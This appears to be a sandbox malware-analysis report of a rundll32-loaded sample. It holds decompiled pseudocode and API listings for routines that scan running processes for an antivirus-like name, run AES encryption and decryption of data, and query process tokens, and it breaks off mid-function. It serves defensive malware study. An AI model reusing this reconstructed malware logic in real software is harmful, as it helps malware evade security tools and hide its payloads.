                    				int _t8;
                    				intOrPtr _t9;
                    				int _t15;
                    				void* _t17;
                    
                    				_t15 = 0;
                    				_t17 = CreateToolhelp32Snapshot(2, 0);
                    				if(_t17 != 0) {
                    					_t8 = Process32First(_t17,  &_v300);
                    					while(_t8 != 0) {
                    						_t9 =  *0x421a320; // 0x87d5a8
                    						_t2 = _t9 + 0x421bea8; // 0x73617661
                    						_push( &_v264);
                    						if( *0x421a110() != 0) {
                    							_t15 = 1;
                    						} else {
                    							_t8 = Process32Next(_t17,  &_v300);
                    							continue;
                    						}
                    						L7:
                    						CloseHandle(_t17);
                    						goto L8;
                    					}
                    					goto L7;
                    				}
                    				L8:
                    				return _t15;
                    			}

                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04212AC4
                    • Process32First.KERNEL32(00000000,?), ref: 04212AD7
                    • Process32Next.KERNEL32(00000000,?), ref: 04212B03
                    • CloseHandle.KERNEL32(00000000), ref: 04212B12
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                    • String ID:
                    • API String ID: 420147892-0
                    • Opcode ID: b2d4de9b1e67c90118113adb4546a3106bacea018c369e4d61966843a1ac0800
                    • Instruction ID: 08e2a2585a9a08f442e855f9ddef55bec6143cb634b14f4475b3b761c4754b5c
                    • Opcode Fuzzy Hash: b2d4de9b1e67c90118113adb4546a3106bacea018c369e4d61966843a1ac0800
                    • Instruction Fuzzy Hash: 84F09632711124ABD721AE35AC4DFDB76ECEBE5714F0000D1F915E7020EA64EA85C7B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04216156(void* __esi) {
                    				struct _SECURITY_ATTRIBUTES* _v4;
                    				void* _t8;
                    				void* _t10;
                    
                    				_v4 = 0;
                    				memset(__esi, 0, 0x38);
                    				_t8 = CreateEventA(0, 1, 0, 0);
                    				 *(__esi + 0x1c) = _t8;
                    				if(_t8 != 0) {
                    					_t10 = CreateEventA(0, 1, 1, 0);
                    					 *(__esi + 0x20) = _t10;
                    					if(_t10 == 0) {
                    						CloseHandle( *(__esi + 0x1c));
                    					} else {
                    						_v4 = 1;
                    					}
                    				}
                    				return _v4;
                    			}

                    APIs
                    • memset.NTDLL ref: 04216164
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74E481D0), ref: 04216179
                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04216186
                    • CloseHandle.KERNEL32(?), ref: 04216198
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: CreateEvent$CloseHandlememset
                    • String ID:
                    • API String ID: 2812548120-0
                    • Opcode ID: a4cbe4330a992cc6f87578c42fb179eb55012477a22cb860c4b62da0b8fd33b0
                    • Instruction ID: c30a3a9fe9b54d7b9e2fc126ceabfce6a18ee87350d24b8d324c7c82235ac3ec
                    • Opcode Fuzzy Hash: a4cbe4330a992cc6f87578c42fb179eb55012477a22cb860c4b62da0b8fd33b0
                    • Instruction Fuzzy Hash: 7BF03AF021430C6FD2109F26EC8492BBBACFB55298B11492DB04682211DA36B815CA70
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0421137B() {
                    				void* _t1;
                    				intOrPtr _t5;
                    				void* _t6;
                    				void* _t7;
                    				void* _t11;
                    
                    				_t1 =  *0x421a30c; // 0x2ec
                    				if(_t1 == 0) {
                    					L8:
                    					return 0;
                    				}
                    				SetEvent(_t1);
                    				_t11 = 0x7fffffff;
                    				while(1) {
                    					SleepEx(0x64, 1);
                    					_t5 =  *0x421a358; // 0x0
                    					if(_t5 == 0) {
                    						break;
                    					}
                    					_t11 = _t11 - 0x64;
                    					if(_t11 > 0) {
                    						continue;
                    					}
                    					break;
                    				}
                    				_t6 =  *0x421a30c; // 0x2ec
                    				if(_t6 != 0) {
                    					CloseHandle(_t6);
                    				}
                    				_t7 =  *0x421a2d8; // 0x46a0000
                    				if(_t7 != 0) {
                    					HeapDestroy(_t7);
                    				}
                    				goto L8;
                    			}

                    APIs
                    • SetEvent.KERNEL32(000002EC,00000001,042110AA), ref: 04211386
                    • SleepEx.KERNEL32(00000064,00000001), ref: 04211395
                    • CloseHandle.KERNEL32(000002EC), ref: 042113B6
                    • HeapDestroy.KERNEL32(046A0000), ref: 042113C6
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: CloseDestroyEventHandleHeapSleep
                    • String ID:
                    • API String ID: 4109453060-0
                    • Opcode ID: 36058b38555bd77a4ae01c2cb3f3e2e7623157d325df39c1afe6fed203062d82
                    • Instruction ID: adc803cb03557512b5b6b53a09e6d17fee049b2f9f7970eb67b0224b71661f6f
                    • Opcode Fuzzy Hash: 36058b38555bd77a4ae01c2cb3f3e2e7623157d325df39c1afe6fed203062d82
                    • Instruction Fuzzy Hash: 00F01C75B123129BD720AA3DF84CB67BBE8EB28761B040514BD40D36A9DE38ED90D960
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04215231(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                    				struct _FILETIME _v12;
                    				void* _t11;
                    				void* _t20;
                    				void* _t22;
                    				void* _t23;
                    				signed short* _t24;
                    
                    				_t22 = __edx;
                    				_t23 = E04215406(_t11, _a12);
                    				if(_t23 == 0) {
                    					_t20 = 8;
                    				} else {
                    					_t24 = _t23 + _a16 * 2;
                    					 *_t24 =  *_t24 & 0x00000000;
                    					_t20 = E042115E6(__ecx, _a4, _a8, _t23);
                    					if(_t20 == 0) {
                    						GetSystemTimeAsFileTime( &_v12);
                    						 *_t24 = 0x5f;
                    						_t20 = E04215B98(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
                    					}
                    					HeapFree( *0x421a2d8, 0, _t23);
                    				}
                    				return _t20;
                    			}

                    APIs
                      • Part of subcall function 04215406: lstrlen.KERNEL32(?,00000000,04A99D58,00000000,04213C77,04A99F7B,69B25F44,?,?,?,?,69B25F44,00000005,0421A00C,4D283A53,?), ref: 0421540D
                      • Part of subcall function 04215406: mbstowcs.NTDLL ref: 04215436
                      • Part of subcall function 04215406: memset.NTDLL ref: 04215448
                    • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,04A993CC), ref: 04215268
                    • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,04A993CC), ref: 04215295
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                    • String ID: Ut
                    • API String ID: 1500278894-8415677
                    • Opcode ID: 6140d6b65322d4fe10718e3749a4903b9e0b5b567ac22f3a0947f04d4b49955f
                    • Instruction ID: fb6b349751d0704994db5192c89ae548a38b67c149bcdfca8fb93e9fe9dd9ba9
                    • Opcode Fuzzy Hash: 6140d6b65322d4fe10718e3749a4903b9e0b5b567ac22f3a0947f04d4b49955f
                    • Instruction Fuzzy Hash: AA01A232310209BBEB115F98DC48F9A7BB9FF94344F104025FA0096170EBB1E9A4D760
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E0421395B(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                    				intOrPtr* _v8;
                    				void* _t17;
                    				intOrPtr* _t22;
                    				void* _t27;
                    				char* _t30;
                    				void* _t33;
                    				void* _t34;
                    				void* _t36;
                    				void* _t37;
                    				void* _t39;
                    				int _t42;
                    
                    				_t17 = __eax;
                    				_t37 = 0;
                    				__imp__(_a4, _t33, _t36, _t27, __ecx);
                    				_t2 = _t17 + 1; // 0x1
                    				_t28 = _t2;
                    				_t34 = E042163FD(_t2);
                    				if(_t34 != 0) {
                    					_t30 = E042163FD(_t28);
                    					if(_t30 == 0) {
                    						E042117AB(_t34);
                    					} else {
                    						_t39 = _a4;
                    						_t22 = E0421799A(_t39);
                    						_v8 = _t22;
                    						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                    							_a4 = _t39;
                    						} else {
                    							_t26 = _t22 + 2;
                    							_a4 = _t22 + 2;
                    							_t22 = E0421799A(_t26);
                    							_v8 = _t22;
                    						}
                    						if(_t22 == 0) {
                    							__imp__(_t34, _a4);
                    							 *_t30 = 0x2f;
                    							 *((char*)(_t30 + 1)) = 0;
                    						} else {
                    							_t42 = _t22 - _a4;
                    							memcpy(_t34, _a4, _t42);
                    							 *((char*)(_t34 + _t42)) = 0;
                    							__imp__(_t30, _v8);
                    						}
                    						 *_a8 = _t34;
                    						_t37 = 1;
                    						 *_a12 = _t30;
                    					}
                    				}
                    				return _t37;
                    			}















                    APIs
                    • lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,042143F7,?,?,?,?,00000102,04211AE3,?,?,00000000), ref: 04213967
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                      • Part of subcall function 0421799A: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04213995,00000000,00000001,00000001,?,?,042143F7,?,?,?,?,00000102), ref: 042179A8
                      • Part of subcall function 0421799A: StrChrA.SHLWAPI(?,0000003F,?,?,042143F7,?,?,?,?,00000102,04211AE3,?,?,00000000,00000000), ref: 042179B2
                    • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,042143F7,?,?,?,?,00000102,04211AE3,?), ref: 042139C5
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 042139D5
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 042139E1
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                    • String ID:
                    • API String ID: 3767559652-0
                    • Opcode ID: cbc670c4a8594aa75dc3fdde3e657d6a01adef7fbbe3d6a07a9ba036a99005fd
                    • Instruction ID: 026ffa852570e8c93f1a6e2566dac5e6c5c6c1ba4e7835acd59e06feb6632cba
                    • Opcode Fuzzy Hash: cbc670c4a8594aa75dc3fdde3e657d6a01adef7fbbe3d6a07a9ba036a99005fd
                    • Instruction Fuzzy Hash: 5321C072710255ABEB129F68C848AAEBFF9DF65284F044050FC059B221D635EA44C7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0421114D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                    				void* _v8;
                    				void* _t18;
                    				int _t25;
                    				int _t29;
                    				int _t34;
                    
                    				_t29 = lstrlenW(_a4);
                    				_t25 = lstrlenW(_a8);
                    				_t18 = E042163FD(_t25 + _t29 + _t25 + _t29 + 2);
                    				_v8 = _t18;
                    				if(_t18 != 0) {
                    					_t34 = _t29 + _t29;
                    					memcpy(_t18, _a4, _t34);
                    					_t10 = _t25 + 2; // 0x2
                    					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                    				}
                    				return _v8;
                    			}









                    APIs
                    • lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,04A993CC,?,04213418,004F0053,04A993CC,?,?,?,?,?,?,042154F9), ref: 0421115D
                    • lstrlenW.KERNEL32(04213418,?,04213418,004F0053,04A993CC,?,?,?,?,?,?,042154F9), ref: 04211164
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,04213418,004F0053,04A993CC,?,?,?,?,?,?,042154F9), ref: 04211184
                    • memcpy.NTDLL(74E069A0,04213418,00000002,00000000,004F0053,74E069A0,?,?,04213418,004F0053,04A993CC), ref: 04211197
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: lstrlenmemcpy$AllocateHeap
                    • String ID:
                    • API String ID: 2411391700-0
                    • Opcode ID: 52adbf8d124eaea7f4ef3e96b531bb8b2aae99c56b440bafe588fd8ddea2d197
                    • Instruction ID: 01590d2e99a282c2de9718a3c96da6cf5debf6e5ab66a1f674c0ea532ea13960
                    • Opcode Fuzzy Hash: 52adbf8d124eaea7f4ef3e96b531bb8b2aae99c56b440bafe588fd8ddea2d197
                    • Instruction Fuzzy Hash: 3BF04F72A00118FBDF11DFA8CC88C9E7BECEF18298B014062F908D7111E631EA148BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • lstrlen.KERNEL32(04A99B50,00000000,00000000,7691C740,04216AE6,00000000), ref: 0421253A
                    • lstrlen.KERNEL32(?), ref: 04212542
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • lstrcpy.KERNEL32(00000000,04A99B50), ref: 04212556
                    • lstrcat.KERNEL32(00000000,?), ref: 04212561
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                    • String ID:
                    • API String ID: 74227042-0
                    • Opcode ID: ae458d9afe6b594bd7668851cf556456197ab51dc86d3a7b62b5b074bf5b7ea5
                    • Instruction ID: cd196a006a8515a9e526343adef0575822edc8bd91476c04e143ef6a24f6d925
                    • Opcode Fuzzy Hash: ae458d9afe6b594bd7668851cf556456197ab51dc86d3a7b62b5b074bf5b7ea5
                    • Instruction Fuzzy Hash: AAE0ED73601661AB87119AE8AC5CCAFFBADEFA96517080456FA0193120DB299D05CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 135 4444872-44448b2 CryptAcquireContextW 136 44448b8-44448f4 memcpy CryptImportKey 135->136 137 4444a09-4444a0f GetLastError 135->137 139 44449f4-44449fa GetLastError 136->139 140 44448fa-444490c CryptSetKeyParam 136->140 138 4444a12-4444a19 137->138 141 44449fd-4444a07 CryptReleaseContext 139->141 142 44449e0-44449e6 GetLastError 140->142 143 4444912-444491b 140->143 141->138 144 44449e9-44449f2 CryptDestroyKey 142->144 145 4444923-4444930 call 44463fd 143->145 146 444491d-444491f 143->146 144->141 150 4444936-444493f 145->150 151 44449d7-44449de 145->151 146->145 147 4444921 146->147 147->145 152 4444942-444494a 150->152 151->144 153 444494c 152->153 154 444494f-444496c memcpy 152->154 153->154 155 4444987-4444996 CryptDecrypt 154->155 156 444496e-4444985 CryptEncrypt 154->156 157 444499c-444499e 155->157 156->157 158 44449a0-44449aa 157->158 159 44449ae-44449b9 GetLastError 157->159 158->152 160 44449ac 158->160 161 44449cd-44449d5 call 44417ab 159->161 162 44449bb-44449cb 159->162 160->162 161->144 162->144
                    C-Code - Quality: 58%
                    			E04444872(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                    				int _v8;
                    				long* _v12;
                    				int _v16;
                    				BYTE* _v20;
                    				long* _v24;
                    				void* _v39;
                    				char _v40;
                    				void _v56;
                    				int _v60;
                    				intOrPtr _v64;
                    				void _v67;
                    				char _v68;
                    				void* _t61;
                    				int _t68;
                    				signed int _t76;
                    				int _t79;
                    				int _t81;
                    				int _t85;
                    				long _t86;
                    				int _t90;
                    				signed int _t94;
                    				int _t101;
                    				BYTE* _t102;
                    				int _t103;
                    				void* _t104;
                    				void* _t105;
                    				void* _t106;
                    
                    				_t103 = __eax;
                    				_t94 = 6;
                    				_v68 = 0;
                    				memset( &_v67, 0, _t94 << 2);
                    				_t105 = _t104 + 0xc;
                    				asm("stosw");
                    				asm("stosb");
                    				_v40 = 0;
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosw");
                    				asm("stosb");
                    				_t61 =  *0x444a0e4( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                    				if(_t61 == 0) {
                    					_a8 = GetLastError();
                    				} else {
                    					_t101 = 0x10;
                    					memcpy( &_v56, _a8, _t101);
                    					_t106 = _t105 + 0xc;
                    					_v60 = _t101;
                    					_v67 = 2;
                    					_v64 = 0x660e;
                    					_v68 = 8;
                    					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                    					if(_t68 == 0) {
                    						_a8 = GetLastError();
                    					} else {
                    						_push(0);
                    						_push( &_v40);
                    						_push(1);
                    						_push(_v12);
                    						if( *0x444a0c4() == 0) {
                    							_a8 = GetLastError();
                    						} else {
                    							_t18 = _t103 + 0xf; // 0x11f
                    							_t76 = _t18 & 0xfffffff0;
                    							if(_a4 != 0 && _t76 == _t103) {
                    								_t76 = _t76 + _t101;
                    							}
                    							_t102 = E044463FD(_t76);
                    							_v20 = _t102;
                    							if(_t102 == 0) {
                    								_a8 = 8;
                    							} else {
                    								_v16 = 0;
                    								_a8 = 0;
                    								while(1) {
                    									_t79 = 0x10;
                    									_v8 = _t79;
                    									if(_t103 <= _t79) {
                    										_v8 = _t103;
                    									}
                    									memcpy(_t102, _a12, _v8);
                    									_t81 = _v8;
                    									_a12 = _a12 + _t81;
                    									_t103 = _t103 - _t81;
                    									_t106 = _t106 + 0xc;
                    									if(_a4 == 0) {
                    										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                    									} else {
                    										_t85 =  *0x444a0c8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                    									}
                    									if(_t85 == 0) {
                    										break;
                    									}
                    									_t90 = _v8;
                    									_v16 = _v16 + _t90;
                    									_t102 =  &(_t102[_t90]);
                    									if(_t103 != 0) {
                    										continue;
                    									} else {
                    										L17:
                    										 *_a16 = _v20;
                    										 *_a20 = _v16;
                    									}
                    									goto L21;
                    								}
                    								_t86 = GetLastError();
                    								_a8 = _t86;
                    								if(_t86 != 0) {
                    									E044417AB(_v20);
                    								} else {
                    									goto L17;
                    								}
                    							}
                    						}
                    						L21:
                    						CryptDestroyKey(_v12);
                    					}
                    					CryptReleaseContext(_v24, 0);
                    				}
                    				return _a8;
                    			}































                    APIs
                    • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,04443AC6), ref: 044448AA
                    • memcpy.NTDLL(?,04443AC6,00000010,?,?,?,?,?,?,?,?,?,?,044460F5,00000000,04444DD9), ref: 044448C3
                    • CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 044448EC
                    • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 04444904
                    • memcpy.NTDLL(00000000,04444DD9,04443AC6,0000011F), ref: 04444956
                    • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,04443AC6,00000020,?,?,0000011F), ref: 0444497F
                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,04443AC6,?,?,0000011F), ref: 04444996
                    • GetLastError.KERNEL32(?,?,0000011F), ref: 044449AE
                    • GetLastError.KERNEL32 ref: 044449E0
                    • CryptDestroyKey.ADVAPI32(?), ref: 044449EC
                    • GetLastError.KERNEL32 ref: 044449F4
                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04444A01
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,044460F5,00000000,04444DD9,04443AC6,?,04443AC6), ref: 04444A09
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                    • String ID:
                    • API String ID: 1967744295-0
                    • Opcode ID: f2afa4c22846992512ed3ba87a630ef2eb96038284c6757c539685ccd52191bb
                    • Instruction ID: 4d0eb4988d3c5b55abee3debef4419fcd2251f160b2b3c0dbecfd69768a0b799
                    • Opcode Fuzzy Hash: f2afa4c22846992512ed3ba87a630ef2eb96038284c6757c539685ccd52191bb
                    • Instruction Fuzzy Hash: 03513E75900208BFFF20DFB5D884AAFBBB8EB84354F00442AF915E6240D775AE54EB21
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 38%
                    			E044477BB(char _a4, void* _a8) {
                    				void* _v8;
                    				void* _v12;
                    				char _v16;
                    				void* _v20;
                    				char _v24;
                    				char _v28;
                    				char _v32;
                    				char _v36;
                    				char _v40;
                    				void* _v44;
                    				void** _t33;
                    				void* _t40;
                    				void* _t43;
                    				void** _t44;
                    				intOrPtr* _t47;
                    				char _t48;
                    
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				_v20 = _a4;
                    				_t48 = 0;
                    				_v16 = 0;
                    				_a4 = 0;
                    				_v44 = 0x18;
                    				_v40 = 0;
                    				_v32 = 0;
                    				_v36 = 0;
                    				_v28 = 0;
                    				_v24 = 0;
                    				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                    					_t33 =  &_v8;
                    					__imp__(_v12, 8, _t33);
                    					if(_t33 >= 0) {
                    						_t47 = __imp__;
                    						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                    						_t44 = E044463FD(_a4);
                    						if(_t44 != 0) {
                    							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                    							if(_t40 >= 0) {
                    								memcpy(_a8,  *_t44, 0x1c);
                    								_t48 = 1;
                    							}
                    							E044417AB(_t44);
                    						}
                    						NtClose(_v8); // executed
                    					}
                    					NtClose(_v12);
                    				}
                    				return _t48;
                    			}




















                    APIs
                    • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04447802
                    • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04447815
                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04447831
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0444784E
                    • memcpy.NTDLL(?,00000000,0000001C), ref: 0444785B
                    • NtClose.NTDLL(?), ref: 0444786D
                    • NtClose.NTDLL(00000000), ref: 04447877
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                    • String ID:
                    • API String ID: 2575439697-0
                    • Opcode ID: 91ec9b9774f70308da5cd8108b4aaecbb6a1214b50b4ecc4f45fa18e38cf8607
                    • Instruction ID: ef852521841354b41aad781251f6626acd60958a71843f3f8ab0b26a7c2434c1
                    • Opcode Fuzzy Hash: 91ec9b9774f70308da5cd8108b4aaecbb6a1214b50b4ecc4f45fa18e38cf8607
                    • Instruction Fuzzy Hash: 752116B6900218BBEF019FA6CC84ADEBFBDEF88750F104066F905A6110D7719A45DBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 68%
                    			E044468EB(long __eax, void* __edx, intOrPtr _a12, void* _a16, void* _a20, intOrPtr _a24) {
                    				intOrPtr _v0;
                    				intOrPtr _v4;
                    				void* _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v24;
                    				intOrPtr _v52;
                    				void* __ecx;
                    				void* __edi;
                    				long _t29;
                    				intOrPtr _t30;
                    				intOrPtr _t31;
                    				intOrPtr _t32;
                    				intOrPtr _t33;
                    				intOrPtr _t34;
                    				void* _t37;
                    				intOrPtr _t38;
                    				int _t41;
                    				void* _t42;
                    				intOrPtr _t46;
                    				intOrPtr _t47;
                    				intOrPtr _t54;
                    				intOrPtr _t58;
                    				intOrPtr* _t60;
                    				void* _t61;
                    				intOrPtr _t66;
                    				intOrPtr _t72;
                    				intOrPtr _t75;
                    				intOrPtr _t78;
                    				int _t81;
                    				intOrPtr _t82;
                    				int _t85;
                    				intOrPtr _t87;
                    				int _t90;
                    				intOrPtr _t92;
                    				int _t95;
                    				intOrPtr* _t97;
                    				intOrPtr* _t98;
                    				void* _t99;
                    				void* _t103;
                    				void* _t104;
                    				void* _t105;
                    				intOrPtr _t106;
                    				void* _t108;
                    				int _t109;
                    				void* _t110;
                    				void* _t111;
                    				void* _t113;
                    				void* _t114;
                    				void* _t116;
                    
                    				_t103 = __edx;
                    				_t29 = __eax;
                    				_t113 = _a20;
                    				_v4 = 8;
                    				if(__eax == 0) {
                    					_t29 = GetTickCount();
                    				}
                    				_t30 =  *0x444a018; // 0x3639fe1b
                    				asm("bswap eax");
                    				_t31 =  *0x444a014; // 0x3a87c8cd
                    				asm("bswap eax");
                    				_t32 =  *0x444a010; // 0xd8d2f808
                    				asm("bswap eax");
                    				_t33 =  *0x444a00c; // 0xeec43f25
                    				asm("bswap eax");
                    				_t34 =  *0x444a320; // 0xafd5a8
                    				_t3 = _t34 + 0x444b633; // 0x74666f73
                    				_t109 = wsprintfA(_t113, _t3, 2, 0x3d170, _t33, _t32, _t31, _t30,  *0x444a02c,  *0x444a004, _t29);
                    				_t37 = E04444B2C();
                    				_t38 =  *0x444a320; // 0xafd5a8
                    				_t4 = _t38 + 0x444b673; // 0x74707526
                    				_t41 = wsprintfA(_t109 + _t113, _t4, _t37);
                    				_t116 = _t114 + 0x38;
                    				_t110 = _t109 + _t41;
                    				if(_a24 != 0) {
